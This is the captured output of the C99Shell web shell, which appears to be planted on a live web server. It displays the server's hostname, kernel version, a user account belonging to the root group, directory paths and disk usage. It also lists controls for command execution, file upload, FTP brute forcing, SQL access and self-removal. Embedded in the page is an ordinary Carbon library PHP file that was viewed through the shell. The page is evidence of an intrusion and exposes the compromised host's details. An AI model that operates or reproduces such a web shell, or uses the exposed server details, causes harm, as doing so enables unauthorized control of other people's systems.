!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/vendor/nesbot/carbon/src/Carbon/PHPStan/   drwxr-xr-x
Free 28.78 GB of 117.98 GB (24.4%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     AbstractMacro.php (4.34 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

/**
 * This file is part of the Carbon package.
 *
 * (c) Brian Nesbitt <brian@nesbot.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Carbon\PHPStan;

use 
Closure;
use 
PHPStan\Reflection\Php\BuiltinMethodReflection;
use 
PHPStan\TrinaryLogic;
use 
ReflectionClass;
use 
ReflectionFunction;
use 
ReflectionMethod;
use 
ReflectionParameter;
use 
ReflectionType;
use 
stdClass;
use 
Throwable;

abstract class 
AbstractMacro implements BuiltinMethodReflection
{
    
/**
     * The reflection function/method.
     *
     * @var ReflectionFunction|ReflectionMethod
     */
    
protected $reflectionFunction;

    
/**
     * The class name.
     *
     * @var class-string
     */
    
private $className;

    
/**
     * The method name.
     *
     * @var string
     */
    
private $methodName;

    
/**
     * The parameters.
     *
     * @var ReflectionParameter[]
     */
    
private $parameters;

    
/**
     * The is static.
     *
     * @var bool
     */
    
private $static false;

    
/**
     * Macro constructor.
     *
     * @param string $className
     * @phpstan-param class-string $className
     *
     * @param string   $methodName
     * @param callable $macro
     */
    
public function __construct(string $classNamestring $methodName$macro)
    {
        
$this->className $className;
        
$this->methodName $methodName;
        
$this->reflectionFunction \is_array($macro)
            ? new 
ReflectionMethod($macro[0], $macro[1])
            : new 
ReflectionFunction($macro);
        
$this->parameters $this->reflectionFunction->getParameters();

        if (
$this->reflectionFunction->isClosure()) {
            try {
                
$closure $this->reflectionFunction->getClosure();
                
$boundClosure Closure::bind($closure, new stdClass());
                
$this->static = (!$boundClosure || (new ReflectionFunction($boundClosure))->getClosureThis() === null);
            } catch (
Throwable $e) {
                
$this->static true;
            }
        }
    }

    
/**
     * {@inheritdoc}
     */
    
public function getDeclaringClass(): ReflectionClass
    
{
        return new 
ReflectionClass($this->className);
    }

    
/**
     * {@inheritdoc}
     */
    
public function isPrivate(): bool
    
{
        return 
false;
    }

    
/**
     * {@inheritdoc}
     */
    
public function isPublic(): bool
    
{
        return 
true;
    }

    
/**
     * {@inheritdoc}
     */
    
public function isFinal(): bool
    
{
        return 
false;
    }

    
/**
     * {@inheritdoc}
     */
    
public function isInternal(): bool
    
{
        return 
false;
    }

    
/**
     * {@inheritdoc}
     */
    
public function isAbstract(): bool
    
{
        return 
false;
    }

    
/**
     * {@inheritdoc}
     */
    
public function isStatic(): bool
    
{
        return 
$this->static;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getDocComment(): ?string
    
{
        return 
$this->reflectionFunction->getDocComment() ?: null;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getName(): string
    
{
        return 
$this->methodName;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getParameters(): array
    {
        return 
$this->parameters;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getReturnType(): ?ReflectionType
    
{
        return 
$this->reflectionFunction->getReturnType();
    }

    
/**
     * {@inheritdoc}
     */
    
public function isDeprecated(): TrinaryLogic
    
{
        return 
TrinaryLogic::createFromBoolean(
            
$this->reflectionFunction->isDeprecated() ||
            
preg_match('/@deprecated/i'$this->getDocComment() ?: '')
        );
    }

    
/**
     * {@inheritdoc}
     */
    
public function isVariadic(): bool
    
{
        return 
$this->reflectionFunction->isVariadic();
    }

    
/**
     * {@inheritdoc}
     */
    
public function getPrototype(): BuiltinMethodReflection
    
{
        return 
$this;
    }

    
/**
     * {@inheritdoc}
     */
    
public function getReflection(): ?ReflectionMethod
    
{
        return 
$this->reflectionFunction instanceof ReflectionMethod
            
$this->reflectionFunction
            
null;
    }

    public function 
getTentativeReturnType(): ?ReflectionType
    
{
        return 
null;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--